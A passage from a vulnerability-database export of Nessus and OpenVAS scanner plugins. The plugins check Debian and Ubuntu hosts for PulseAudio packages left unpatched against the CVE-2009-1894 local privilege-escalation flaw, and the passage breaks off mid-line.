pkgname:\"pulseaudio-module-hal-dbg\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"pulseaudio-module-lirc\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"pulseaudio-module-lirc-dbg\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"pulseaudio-module-x11\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"pulseaudio-module-x11-dbg\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"pulseaudio-module-zeroconf\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"pulseaudio-module-zeroconf-dbg\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"pulseaudio-utils\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"pulseaudio-utils-dbg\", pkgver:\"0.9.14-0ubuntu20.2\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libpulse-browse0 / libpulse-browse0-dbg / libpulse-dev / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T13:05:13", "description": "Tavis Ormandy and Julien Tinnes discovered that the pulseaudio daemon does not drop privileges before re-executing itself, enabling local attackers to increase their privileges.", "cvss3": {"score": null, "vector": null}, "published": "2010-02-24T00:00:00", "type": "nessus", "title": "Debian DSA-1838-1 : pulseaudio - privilege escalation", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1894"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:pulseaudio", "cpe:/o:debian:debian_linux:5.0"], "id": "DEBIAN_DSA-1838.NASL", "href": "https://www.tenable.com/plugins/nessus/44703", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1838. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(44703);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2009-1894\");\n script_xref(name:\"DSA\", value:\"1838\");\n\n script_name(english:\"Debian DSA-1838-1 : pulseaudio - privilege escalation\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Tavis Ormandy and Julien Tinnes discovered that the pulseaudio daemon\ndoes not drop privileges before re-executing itself, enabling local\nattackers to increase their privileges.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=537351\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2009/dsa-1838\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the pulseaudio packages.\n\nThe old stable distribution (etch) is not affected by this issue.\n\nFor the stable distribution (lenny), this problem has been fixed in\nversion 0.9.10-3+lenny1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(362);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:pulseaudio\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:5.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/07/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/02/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"5.0\", prefix:\"libpulse-browse0\", reference:\"0.9.10-3+lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"libpulse-browse0-dbg\", reference:\"0.9.10-3+lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"libpulse-dev\", reference:\"0.9.10-3+lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"libpulse-mainloop-glib0\", reference:\"0.9.10-3+lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"libpulse-mainloop-glib0-dbg\", reference:\"0.9.10-3+lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"libpulse0\", reference:\"0.9.10-3+lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"libpulse0-dbg\", reference:\"0.9.10-3+lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"libpulsecore5\", reference:\"0.9.10-3+lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"libpulsecore5-dbg\", reference:\"0.9.10-3+lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"pulseaudio\", reference:\"0.9.10-3+lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"pulseaudio-dbg\", reference:\"0.9.10-3+lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"pulseaudio-esound-compat\", reference:\"0.9.10-3+lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"pulseaudio-esound-compat-dbg\", reference:\"0.9.10-3+lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"pulseaudio-module-gconf\", reference:\"0.9.10-3+lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"pulseaudio-module-gconf-dbg\", reference:\"0.9.10-3+lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"pulseaudio-module-hal\", reference:\"0.9.10-3+lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"pulseaudio-module-hal-dbg\", reference:\"0.9.10-3+lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"pulseaudio-module-jack\", reference:\"0.9.10-3+lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"pulseaudio-module-jack-dbg\", reference:\"0.9.10-3+lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"pulseaudio-module-lirc\", reference:\"0.9.10-3+lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"pulseaudio-module-lirc-dbg\", reference:\"0.9.10-3+lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"pulseaudio-module-x11\", reference:\"0.9.10-3+lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"pulseaudio-module-x11-dbg\", reference:\"0.9.10-3+lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"pulseaudio-module-zeroconf\", reference:\"0.9.10-3+lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"pulseaudio-module-zeroconf-dbg\", reference:\"0.9.10-3+lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"pulseaudio-utils\", reference:\"0.9.10-3+lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"pulseaudio-utils-dbg\", reference:\"0.9.10-3+lenny1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2017-07-24T12:57:12", "description": "The remote host is missing an update to pulseaudio\nannounced via advisory DSA 1838-1.", "cvss3": {}, "published": "2009-07-29T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 1838-1 (pulseaudio)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1894"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:64476", "href": "http://plugins.openvas.org/nasl.php?oid=64476", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1838_1.nasl 6615 2017-07-07 12:09:52Z cfischer $\n# Description: Auto-generated from advisory DSA 1838-1 (pulseaudio)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Tavis Ormandy and Julien Tinnes discovered that the pulseaudio daemon\ndoes not drop privileges before re-executing itself, enabling local\nattackers to increase their privileges.\n\nThe old stable distribution (etch) is not affected by this issue.\n\nFor the stable distribution (lenny), this problem has been fixed in\nversion 0.9.10-3+lenny1.\n\nFor the unstable distribution (sid), this problem will be fixed soon.\n\nWe recommend that you upgrade your pulseaudio packages.\";\ntag_summary = \"The remote host is missing an update to pulseaudio\nannounced via advisory DSA 1838-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201838-1\";\n\n\nif(description)\n{\n script_id(64476);\n script_version(\"$Revision: 6615 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:09:52 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-07-29 19:28:37 +0200 (Wed, 29 Jul 2009)\");\n script_cve_id(\"CVE-2009-1894\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 1838-1 (pulseaudio)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-zeroconf\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-hal-dbg\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse0\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-gconf-dbg\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulsecore5-dbg\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-x11\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-jack\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-lirc\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-esound-compat\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-hal\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse-mainloop-glib0-dbg\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-lirc-dbg\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse-mainloop-glib0\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-esound-compat-dbg\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-x11-dbg\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-utils-dbg\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse-browse0-dbg\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse-browse0\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse0-dbg\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-utils\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-zeroconf-dbg\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse-dev\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-gconf\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulsecore5\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-jack-dbg\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-dbg\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-04T11:29:58", "description": "The remote host is missing an update to pulseaudio\nannounced via advisory USN-804-1.", "cvss3": {}, "published": "2009-07-29T00:00:00", "type": "openvas", "title": "Ubuntu USN-804-1 (pulseaudio)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1894"], "modified": "2017-12-01T00:00:00", "id": "OPENVAS:64445", "href": "http://plugins.openvas.org/nasl.php?oid=64445", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: ubuntu_804_1.nasl 7969 2017-12-01 09:23:16Z santu $\n# $Id: ubuntu_804_1.nasl 7969 2017-12-01 09:23:16Z santu $\n# Description: Auto-generated from advisory USN-804-1 (pulseaudio)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_solution = \"The problem can be corrected by upgrading your system to the\n following package versions:\n\nUbuntu 8.04 LTS:\n pulseaudio 0.9.10-1ubuntu1.1\n\nUbuntu 8.10:\n pulseaudio 0.9.10-2ubuntu9.4\n\nUbuntu 9.04:\n pulseaudio 1:0.9.14-0ubuntu20.2\n\nIn general, a standard system upgrade is sufficient to effect the\nnecessary changes.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=USN-804-1\";\n\ntag_insight = \"Tavis Ormandy and Yorick Koster discovered that PulseAudio did not\nsafely re-execute itself. A local attacker could exploit this to gain\nroot privileges.\";\ntag_summary = \"The remote host is missing an update to pulseaudio\nannounced via advisory USN-804-1.\";\n\n \n\n\nif(description)\n{\n script_id(64445);\n script_version(\"$Revision: 7969 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 10:23:16 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-07-29 19:28:37 +0200 (Wed, 29 Jul 2009)\");\n script_cve_id(\"CVE-2009-1894\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Ubuntu USN-804-1 (pulseaudio)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-804-1/\");\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libpulse-browse0-dbg\", ver:\"0.9.10-1ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse-browse0\", ver:\"0.9.10-1ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse-dev\", ver:\"0.9.10-1ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse-mainloop-glib0-dbg\", ver:\"0.9.10-1ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse-mainloop-glib0\", ver:\"0.9.10-1ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse0-dbg\", ver:\"0.9.10-1ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse0\", ver:\"0.9.10-1ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulsecore5-dbg\", ver:\"0.9.10-1ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulsecore5\", ver:\"0.9.10-1ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-dbg\", ver:\"0.9.10-1ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-esound-compat-dbg\", ver:\"0.9.10-1ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-esound-compat\", ver:\"0.9.10-1ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-gconf-dbg\", ver:\"0.9.10-1ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-gconf\", ver:\"0.9.10-1ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-hal-dbg\", ver:\"0.9.10-1ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-hal\", ver:\"0.9.10-1ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-lirc-dbg\", ver:\"0.9.10-1ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-lirc\", ver:\"0.9.10-1ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-x11-dbg\", ver:\"0.9.10-1ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-x11\", ver:\"0.9.10-1ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-zeroconf-dbg\", ver:\"0.9.10-1ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-zeroconf\", ver:\"0.9.10-1ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-utils-dbg\", ver:\"0.9.10-1ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-utils\", ver:\"0.9.10-1ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio\", ver:\"0.9.10-1ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse-browse0-dbg\", ver:\"0.9.10-2ubuntu9.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse-browse0\", ver:\"0.9.10-2ubuntu9.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse-dev\", ver:\"0.9.10-2ubuntu9.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse-mainloop-glib0-dbg\", ver:\"0.9.10-2ubuntu9.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse-mainloop-glib0\", ver:\"0.9.10-2ubuntu9.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse0-dbg\", ver:\"0.9.10-2ubuntu9.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse0\", ver:\"0.9.10-2ubuntu9.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulsecore5-dbg\", ver:\"0.9.10-2ubuntu9.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulsecore5\", ver:\"0.9.10-2ubuntu9.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-dbg\", ver:\"0.9.10-2ubuntu9.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-esound-compat-dbg\", ver:\"0.9.10-2ubuntu9.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-esound-compat\", ver:\"0.9.10-2ubuntu9.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-gconf-dbg\", ver:\"0.9.10-2ubuntu9.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-gconf\", ver:\"0.9.10-2ubuntu9.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-hal-dbg\", ver:\"0.9.10-2ubuntu9.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-hal\", ver:\"0.9.10-2ubuntu9.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-lirc-dbg\", ver:\"0.9.10-2ubuntu9.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-lirc\", ver:\"0.9.10-2ubuntu9.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-x11-dbg\", ver:\"0.9.10-2ubuntu9.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-x11\", ver:\"0.9.10-2ubuntu9.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-zeroconf-dbg\", ver:\"0.9.10-2ubuntu9.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-zeroconf\", ver:\"0.9.10-2ubuntu9.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-utils-dbg\", ver:\"0.9.10-2ubuntu9.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-utils\", ver:\"0.9.10-2ubuntu9.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = 